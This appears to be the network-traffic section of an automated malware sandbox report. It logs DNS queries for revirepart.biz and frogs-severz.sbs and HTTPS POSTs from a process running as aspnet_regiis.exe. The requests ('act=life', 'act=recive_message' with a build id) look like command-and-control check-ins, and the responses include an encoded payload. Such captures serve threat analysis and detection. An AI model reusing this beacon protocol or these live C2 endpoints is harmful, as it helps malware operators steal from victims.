                                                                  Nov 23, 2024 10:25:11.575584888 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:11.577189922 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:11.577198029 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:11.577404976 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:11.585436106 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:11.585597038 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:11.585628033 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:12.351083994 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:12.351166010 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:12.351340055 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:12.351408005 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:12.351423979 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:12.540808916 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:12.540837049 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:12.540920019 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:12.541270018 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:12.541282892 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:13.846067905 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:13.846175909 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:13.852065086 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:13.852085114 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:13.852267981 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:13.859141111 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:13.859240055 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:13.859276056 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:13.859349966 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:13.859359026 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:14.718240023 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:14.718313932 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:14.718368053 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:14.723893881 CET49742443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:14.723916054 CET44349742104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:15.297740936 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:15.297837019 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:15.297941923 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:15.298384905 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:15.298417091 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:16.603773117 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:16.603880882 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:16.605113983 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:16.605149031 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:16.605484009 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:16.607104063 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:16.607194901 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:16.607208014 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:17.316509008 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:17.316622972 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:17.316716909 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:17.316848040 CET49744443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:17.316888094 CET44349744104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:17.434503078 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:17.434545994 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:17.434742928 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:17.435230017 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:17.435245991 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:18.738053083 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:18.738157034 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:18.739310026 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:18.739331007 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:18.739566088 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:18.740592957 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:18.740683079 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:18.740689993 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:20.152298927 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:20.152429104 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:20.152510881 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:20.152630091 CET49747443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:20.152647018 CET44349747104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:20.188637972 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:20.188680887 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:20.188764095 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:20.189080000 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:20.189102888 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:21.447834969 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:21.447906971 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:21.449721098 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:21.449729919 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:21.450056076 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:21.451354980 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:21.451383114 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:21.451437950 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:22.151319981 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:22.151463032 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:22.151509047 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:22.151844978 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:22.151861906 CET44349749104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:22.151879072 CET49749443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:22.151886940 CET44349749104.21.88.250192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 23, 2024 10:25:00.042087078 CET5674553192.168.2.41.1.1.1
                                                                  Nov 23, 2024 10:25:00.350687981 CET53567451.1.1.1192.168.2.4
                                                                  Nov 23, 2024 10:25:02.369648933 CET5543553192.168.2.41.1.1.1
                                                                  Nov 23, 2024 10:25:02.599664927 CET53554351.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 23, 2024 10:25:00.042087078 CET192.168.2.41.1.1.10x9f3eStandard query (0)revirepart.bizA (IP address)IN (0x0001)false
                                                                  Nov 23, 2024 10:25:02.369648933 CET192.168.2.41.1.1.10xee2dStandard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 23, 2024 10:25:00.350687981 CET1.1.1.1192.168.2.40x9f3eNo error (0)revirepart.biz104.21.43.198A (IP address)IN (0x0001)false
                                                                  Nov 23, 2024 10:25:00.350687981 CET1.1.1.1192.168.2.40x9f3eNo error (0)revirepart.biz172.67.184.174A (IP address)IN (0x0001)false
                                                                  Nov 23, 2024 10:25:02.599664927 CET1.1.1.1192.168.2.40xee2dNo error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                  Nov 23, 2024 10:25:02.599664927 CET1.1.1.1192.168.2.40xee2dNo error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
                                                                  • revirepart.biz
                                                                  • frogs-severz.sbs
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449730104.21.43.1984437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:01 UTC261OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: revirepart.biz
                                                                  2024-11-23 09:25:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2024-11-23 09:25:02 UTC1011INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=23silfq477v9bo4g4cvehhhfvi; expires=Wed, 19 Mar 2025 03:11:41 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeUdikMcFrU00IJTlIIl5gUUhi95hMXtbll5c45jCOkleMvCIeZHJ40R5d4WLjeR5NZ9xxCP0NedKMdIWXK7%2Fxr4blC4zHqZfejrsUFV%2FBn4oCQ9vaTDtExsZzmG5jB%2Bjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c0f2dfa4400-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1815920&cwnd=155&unsent_bytes=0&cid=81411e1381eb181a&ts=697&x=0"
                                                                  2024-11-23 09:25:02 UTC9INData Raw: 34 0d 0a 66 61 69 6c 0d 0a
                                                                  Data Ascii: 4fail
                                                                  2024-11-23 09:25:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449732104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:03 UTC263OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2024-11-23 09:25:04 UTC1005INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=q1un3acrkb8op2uigkr0fpb1c5; expires=Wed, 19-Mar-2025 03:11:43 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7w8GIerBXfh2vW8LixNNncubinFPOm0SO5rnfo7%2Ffko0DcDc5XKHvSKDQa%2BcsoHDwOVU2qezZZY1CqUWnXILGilR9b3k7sKj24USpqol4ztgC7Wma2qQ07kvFsH5CZBbWfy"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c1d2834430a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1592148&cwnd=234&unsent_bytes=0&cid=59f8a078e99d8b8f&ts=718&x=0"
                                                                  2024-11-23 09:25:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                  Data Ascii: 2ok
                                                                  2024-11-23 09:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449734104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:05 UTC264OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 86
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:05 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                  Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                  2024-11-23 09:25:06 UTC1003INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=re082bm4rhh2lnr1n0gqp5fsdl; expires=Wed, 19-Mar-2025 03:11:45 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ubc7OVg9HIoSMyM19H8hXj0KenKGlTJKvDZb0WQXpwbd9qi10G7VC4YEuKXaDzg03jckXVqSrb3Rdw6QUbRxabRYRHLHFfR%2FYlCX8NowGIV6AmToXOGxt0VsFCVelCMHcYN5"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c29a8894369-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2122&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1345622&cwnd=230&unsent_bytes=0&cid=e9ea72a8b55a3f72&ts=702&x=0"
                                                                  2024-11-23 09:25:06 UTC366INData Raw: 31 64 37 32 0d 0a 49 4b 5a 6e 78 71 44 50 42 2f 2f 52 7a 6f 77 54 73 62 30 44 5a 7a 70 34 4f 76 54 75 35 6c 66 44 4c 57 73 54 48 6e 69 65 57 75 35 62 68 42 48 6b 6d 76 73 72 33 61 4b 72 72 69 6e 58 33 47 38 55 58 31 51 59 6c 59 72 45 62 61 56 4d 42 32 42 37 56 4c 77 73 67 77 4b 63 41 61 66 4d 76 47 4c 54 38 36 76 30 4d 59 76 6d 65 45 56 66 46 68 6a 4f 7a 49 4d 39 6f 55 77 48 63 58 38 54 38 53 71 43 51 38 34 4c 6f 63 69 71 5a 4a 75 77 6f 75 46 32 31 4e 68 69 44 56 51 52 56 35 79 44 78 48 76 68 53 42 45 78 4a 46 72 54 50 35 70 42 36 77 61 31 79 2b 31 36 30 36 72 73 36 58 32 54 68 79 45 47 58 78 70 57 6b 6f 71 4e 50 36 74 46 44 33 42 36 45 75 34 7a 69 45 6a 4f 42 61 4c 4a 6f 47 32 50 76 61 6a 6d 66 64 4c 53 59 6b 55 57 57 6c 2b 4f 7a 4e 78 31 38 6e 30 4b 59
                                                                  Data Ascii: 1d72IKZnxqDPB//RzowTsb0DZzp4OvTu5lfDLWsTHnieWu5bhBHkmvsr3aKrrinX3G8UX1QYlYrEbaVMB2B7VLwsgwKcAafMvGLT86v0MYvmeEVfFhjOzIM9oUwHcX8T8SqCQ84LociqZJuwouF21NhiDVQRV5yDxHvhSBExJFrTP5pB6wa1y+1606rs6X2ThyEGXxpWkoqNP6tFD3B6Eu4ziEjOBaLJoG2PvajmfdLSYkUWWl+OzNx18n0KY
                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 61 67 78 56 46 31 69 62 68 6f 73 32 6f 55 67 44 65 33 4d 51 2b 44 57 42 52 4d 51 46 35 49 7a 74 59 6f 58 7a 39 4b 35 53 31 73 39 6d 43 55 35 59 59 74 61 54 79 69 7a 68 53 41 55 78 4a 46 72 30 50 59 39 42 7a 77 71 6e 79 71 5a 33 6e 61 47 71 34 33 54 42 32 57 51 4c 55 68 6c 4b 6e 49 4b 43 4e 71 68 45 41 48 52 37 48 72 78 32 7a 45 58 63 52 66 79 43 6a 47 69 57 76 36 62 35 63 5a 50 41 4c 78 77 59 48 56 54 57 31 4d 51 78 6f 45 73 49 64 58 49 55 2b 44 53 4b 54 4d 6b 4b 6f 73 69 74 59 70 65 37 70 4f 39 38 32 4e 42 68 41 46 55 65 58 70 71 4e 67 58 58 76 44 77 35 70 50 45 4b 38 46 6f 74 42 31 6b 65 52 77 61 4e 72 6d 71 58 73 38 54 2f 4b 6e 32 59 4a 47 45 49 59 6d 49 6d 4c 4a 36 42 64 44 48 39 75 46 76 6b 2b 67 55 48 4b 42 61 48 46 6f 47 75 62 74 4b 2f 6d 64 64 4c
                                                                  Data Ascii: agxVF1ibhos2oUgDe3MQ+DWBRMQF5IztYoXz9K5S1s9mCU5YYtaTyizhSAUxJFr0PY9BzwqnyqZ3naGq43TB2WQLUhlKnIKCNqhEAHR7Hrx2zEXcRfyCjGiWv6b5cZPALxwYHVTW1MQxoEsIdXIU+DSKTMkKositYpe7pO982NBhAFUeXpqNgXXvDw5pPEK8FotB1keRwaNrmqXs8T/Kn2YJGEIYmImLJ6BdDH9uFvk+gUHKBaHFoGubtK/mddL
                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 45 49 59 6d 6f 57 45 50 71 74 4c 43 58 5a 78 48 2f 38 2f 6a 30 2f 44 44 36 72 46 71 57 6d 55 76 71 72 75 64 74 66 61 63 77 42 52 46 6c 54 57 77 73 51 79 75 51 39 52 4d 56 4d 64 36 6a 75 6a 51 64 55 4d 35 4e 33 6a 66 4e 32 30 6f 4b 34 70 6b 39 68 6b 44 56 4d 63 55 4a 61 65 67 54 75 71 54 67 4e 33 66 52 66 77 50 6f 78 44 78 41 4f 6f 77 71 70 69 6a 36 47 70 36 47 50 5a 6e 79 39 46 58 77 49 59 7a 73 79 79 4a 62 5a 65 48 7a 4e 4a 47 66 49 32 69 31 53 45 47 75 72 62 37 57 4b 52 38 2f 53 75 65 74 50 54 5a 67 31 65 48 6c 43 5a 67 34 30 6e 6f 45 4d 48 59 33 73 61 39 54 61 44 54 73 30 49 6f 38 2b 6d 62 35 43 33 71 2b 38 78 6e 5a 39 6d 48 52 68 43 47 4b 43 63 69 54 6d 50 52 41 56 34 50 41 57 79 49 63 78 46 79 45 58 38 67 71 6c 70 6c 62 6d 6a 35 33 76 5a 30 47 67 46
                                                                  Data Ascii: EIYmoWEPqtLCXZxH/8/j0/DD6rFqWmUvqrudtfacwBRFlTWwsQyuQ9RMVMd6jujQdUM5N3jfN20oK4pk9hkDVMcUJaegTuqTgN3fRfwPoxDxAOowqpij6Gp6GPZny9FXwIYzsyyJbZeHzNJGfI2i1SEGurb7WKR8/SuetPTZg1eHlCZg40noEMHY3sa9TaDTs0Io8+mb5C3q+8xnZ9mHRhCGKCciTmPRAV4PAWyIcxFyEX8gqlplbmj53vZ0GgF
                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 6a 4d 67 79 33 68 46 30 6c 65 57 79 2b 2b 47 62 59 43 32 30 75 39 67 71 70 70 33 65 76 73 34 6e 4c 66 31 32 34 44 55 52 5a 53 6e 34 65 49 50 71 56 44 41 48 52 36 47 2f 6b 39 6a 55 62 49 44 36 4c 42 72 6d 71 53 76 4b 53 75 50 35 50 59 65 55 55 41 57 6e 32 42 68 34 6f 7a 34 56 42 48 61 44 77 64 38 48 6a 55 41 73 67 4d 6f 73 53 6f 61 5a 79 31 70 4f 74 35 31 39 35 6e 41 31 73 56 58 4a 4f 4e 69 7a 47 74 51 51 4e 77 66 52 62 33 4e 34 64 48 68 45 76 6b 78 62 55 6c 78 66 4f 64 37 57 66 45 7a 32 31 46 52 31 52 42 31 6f 75 49 64 66 6b 50 43 47 4e 32 45 50 49 39 67 30 66 48 43 71 50 50 71 32 6d 58 75 71 54 6f 66 74 72 4e 59 67 6c 57 48 56 61 61 67 6f 6b 2f 6f 6b 4a 4a 50 7a 77 64 35 48 6a 55 41 75 67 43 71 65 79 6d 61 5a 72 7a 73 36 42 6f 6b 39 68 74 52 51 42 61 56
                                                                  Data Ascii: jMgy3hF0leWy++GbYC20u9gqpp3evs4nLf124DURZSn4eIPqVDAHR6G/k9jUbID6LBrmqSvKSuP5PYeUUAWn2Bh4oz4VBHaDwd8HjUAsgMosSoaZy1pOt5195nA1sVXJONizGtQQNwfRb3N4dHhEvkxbUlxfOd7WfEz21FR1RB1ouIdfkPCGN2EPI9g0fHCqPPq2mXuqToftrNYglWHVaagok/okJJPzwd5HjUAugCqeymaZrzs6Bok9htRQBaV
                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 6c 73 55 78 4c 51 47 6f 5a 36 6a 4f 42 54 6f 51 61 36 74 76 74 59 70 48 7a 39 4b 35 33 33 4e 5a 69 43 6c 6b 54 56 4a 75 4a 6a 54 43 67 53 51 31 37 64 68 72 36 50 6f 31 48 7a 67 61 6c 79 4b 52 69 6c 62 53 76 2f 44 47 64 6e 32 59 64 47 45 49 59 76 34 75 57 4f 37 45 50 46 6a 39 6c 57 76 73 30 7a 42 71 45 41 61 37 4e 71 57 4b 52 74 61 6e 6f 66 4e 4c 51 59 41 56 58 48 6c 4f 66 69 6f 55 34 70 45 49 4e 59 33 59 52 38 7a 53 46 54 73 6c 46 36 6f 4b 71 66 64 33 72 37 4e 39 38 33 64 46 6d 45 78 67 46 46 6f 2f 4d 67 7a 6e 68 46 30 6c 77 63 42 58 2f 4e 34 39 42 78 51 2b 32 30 4b 46 73 6c 62 61 67 35 58 2f 56 7a 57 63 4b 55 52 6c 62 6e 34 75 4d 4f 61 74 4d 44 6a 45 79 57 76 73 67 7a 42 71 45 4a 72 50 53 6f 43 57 43 2f 62 57 75 64 74 2b 66 4f 55 56 51 46 31 43 63 69 49
                                                                  Data Ascii: lsUxLQGoZ6jOBToQa6tvtYpHz9K533NZiClkTVJuJjTCgSQ17dhr6Po1HzgalyKRilbSv/DGdn2YdGEIYv4uWO7EPFj9lWvs0zBqEAa7NqWKRtanofNLQYAVXHlOfioU4pEINY3YR8zSFTslF6oKqfd3r7N983dFmExgFFo/MgznhF0lwcBX/N49BxQ+20KFslbag5X/VzWcKURlbn4uMOatMDjEyWvsgzBqEJrPSoCWC/bWudt+fOUVQF1CciI
                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 41 58 4a 38 48 76 67 2f 69 55 48 49 44 71 50 42 6f 6d 47 55 76 61 58 68 4d 5a 32 66 5a 68 30 59 51 68 69 33 6c 34 63 35 72 41 38 57 50 32 56 61 2b 7a 54 4d 47 6f 51 4a 71 73 65 74 62 35 75 33 71 65 68 37 31 74 39 71 42 6c 63 65 58 70 4b 44 68 44 36 6f 54 67 39 30 64 68 48 36 4e 59 39 45 77 6b 58 71 67 71 70 39 33 65 76 73 7a 6d 72 65 30 32 5a 46 52 31 52 42 31 6f 75 49 64 66 6b 50 41 6e 31 34 48 66 77 31 6a 30 72 42 41 61 37 48 72 57 32 50 75 36 7a 70 59 38 48 66 61 41 42 55 47 56 69 53 69 6f 30 7a 6f 6b 74 4a 50 7a 77 64 35 48 6a 55 41 75 6b 4a 6f 2b 75 71 66 74 32 73 34 76 63 78 31 4e 4d 68 58 52 67 62 55 35 79 44 69 54 61 6e 54 41 4a 30 64 68 76 37 4d 49 46 51 78 77 71 72 78 71 31 71 6d 37 57 74 34 58 66 55 31 6d 41 4e 58 31 6f 57 31 6f 75 63 64 66 6b
                                                                  Data Ascii: AXJ8Hvg/iUHIDqPBomGUvaXhMZ2fZh0YQhi3l4c5rA8WP2Va+zTMGoQJqsetb5u3qeh71t9qBlceXpKDhD6oTg90dhH6NY9EwkXqgqp93evszmre02ZFR1RB1ouIdfkPAn14Hfw1j0rBAa7HrW2Pu6zpY8HfaABUGViSio0zoktJPzwd5HjUAukJo+uqft2s4vcx1NMhXRgbU5yDiTanTAJ0dhv7MIFQxwqrxq1qm7Wt4XfU1mANX1oW1oucdfk
                                                                  2024-11-23 09:25:06 UTC335INData Raw: 67 33 74 64 4a 6c 42 79 67 75 6a 31 4f 30 72 33 62 7a 73 74 6b 69 54 6c 79 45 36 46 6c 70 41 31 74 54 45 41 4b 4a 42 42 33 5a 71 43 37 45 66 6c 6b 2f 43 45 72 57 43 34 79 57 62 38 2f 53 2b 50 35 50 62 63 45 55 41 53 67 72 4e 32 64 64 69 38 52 30 57 50 32 56 61 36 6e 6a 55 45 49 70 46 74 6f 4c 31 4a 64 71 77 76 76 78 33 30 4d 6c 69 51 6d 59 6b 64 70 47 4b 67 54 4b 78 44 53 64 36 61 42 32 38 64 73 78 4e 68 46 32 64 67 75 55 6c 6f 76 33 73 39 6a 47 4c 6e 31 51 47 56 68 52 66 67 4a 33 4a 47 36 5a 4a 44 48 5a 73 57 4e 49 7a 6d 45 57 45 53 2b 54 45 37 54 33 4e 2f 65 7a 71 59 4a 4f 48 4d 56 63 44 54 77 76 42 33 4e 59 71 37 31 5a 4a 5a 7a 78 43 72 6e 62 4d 55 49 52 64 35 49 57 75 64 34 2b 31 72 2f 68 79 6c 4f 46 66 42 6b 34 58 56 35 32 4e 75 67 75 50 51 67 68 79
                                                                  Data Ascii: g3tdJlByguj1O0r3bzstkiTlyE6FlpA1tTEAKJBB3ZqC7Eflk/CErWC4yWb8/S+P5PbcEUASgrN2ddi8R0WP2Va6njUEIpFtoL1Jdqwvvx30MliQmYkdpGKgTKxDSd6aB28dsxNhF2dguUlov3s9jGLn1QGVhRfgJ3JG6ZJDHZsWNIzmEWES+TE7T3N/ezqYJOHMVcDTwvB3NYq71ZJZzxCrnbMUIRd5IWud4+1r/hylOFfBk4XV52NuguPQghy
